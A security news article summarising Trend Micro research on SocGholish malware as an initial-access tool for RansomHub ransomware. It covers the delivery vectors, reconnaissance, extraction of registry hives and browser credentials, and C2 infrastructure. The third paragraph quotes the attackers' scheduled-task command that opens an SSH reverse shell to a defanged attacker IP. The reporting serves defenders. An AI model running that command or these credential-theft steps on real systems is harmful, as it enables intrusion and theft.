SocGholish Malware Identified as Key Enabler of RansomHub Ransomware Attacks

The union of cybercrime has revealed an escalating threat involving the SocGholish malware framework paired with RansomHub ransomware, forming an intrusion set tracked as Water Scylla, as identified by Trend Micro researchers. The surge in activity is evident, with Trend Micro's telemetry showing increased SocGholish detections in 2025, with the United States experiencing the highest infection rates, particularly within government organizations. The malware is distributed through multiple vectors, including compromised websites, rogue Keitaro Traffic Distribution System (TDS) instances, fake browser update pages, and malicious ZIP files. SocGholish’s infrastructure is extensive, with over a thousand compromised websites redirecting traffic to malicious domains. Trend Micro warns that "SocGholish’s key role in enabling initial access for ransomware warrants the attention of defenders to thwart attacks," as its backdoors grant persistent access to infected systems. RansomHub’s infrastructure further compounds the threat, with Trend Micro identifying "22 IP addresses across a diverse range of Autonomous Systems (ASNs), predominantly located in the US, with just two located in the Netherlands and Germany, respectively."

Analysis of the SocGholish infection chain reveals that execution begins with a malicious JavaScript file via Windows Scripting Host (wscript.exe), which subsequently spawns cmd.exe and PowerShell processes. Initial tasks focus on reconnaissance, with the malware executing five primary objectives: system discovery, credential harvesting, exfiltration, backdoor deployment, and reverse shell establishment. PowerShell commands leverage Active Directory Service Interfaces (ADSI), net commands, and nltest to enumerate domain users, system configurations, and network shares. The attack then escalates with Python execution, including the installation of dependencies and the creation of an SSH tunnel. Notably, a hardcoded command-and-control (C2) address linked to RansomHub is embedded in the payload. For credential theft, Trend Micro analysis observed various activities, including the use of "certutil.exe --encode" to extract critical registry hives, such as SAM, SECURITY, and SYSTEM, facilitating credential theft as well as capturing stored browser credentials.

Persistence mechanisms include the creation of scheduled tasks, with a notable example deploying an SSH reverse shell: "SCHTASKS /create /tn 'Update' /tr 'ssh.exe -R 2525 -p 443 -o StrictHostKeyChecking=no cvhjkluytrdcvjytfasdv@5.61.39[.]26' /sc minute /mo 5." Attackers exhibit hands-on-keyboard activity, evident from observed syntax errors such as "net use <username> /domain." Correct reconnaissance commands issued during the attack include "systeminfo," "ipconfig /all," and "net use." Targeted efforts were made to locate credentials based on a string search for "pass." Lastly, the NirCMD utility was downloaded and executed, allowing attackers to capture and exfiltrate screenshots to C2 servers. SMB protocol abuse was observed, where a batch file was deployed via scheduled tasks for further credential extraction and lateral movement. Despite temporary deletions of artifacts, Trend Micro's forensic analysis indicates ongoing attempts to harvest credentials from browser stores and encrypted vaults. "Although, the file being unavailable, the telemetry available on the host indicates the batch file appears to be attempting to extract encrypted keys from local state files associated with Microsoft Edge and Google Chrome browsers and save the results in the %PROGRAMDATA% folder as a *.log file."

Trend Micro’s investigation of SocGholish infrastructure reveals 18 active C2 servers, with domains rotating weekly to evade detection. The malware operators utilize domain shadowing techniques, leveraging compromised legitimate domains to disguise malicious activity. RansomHub’s infrastructure remains a critical concern, as its affiliates employ SocGholish infections for ransomware deployment.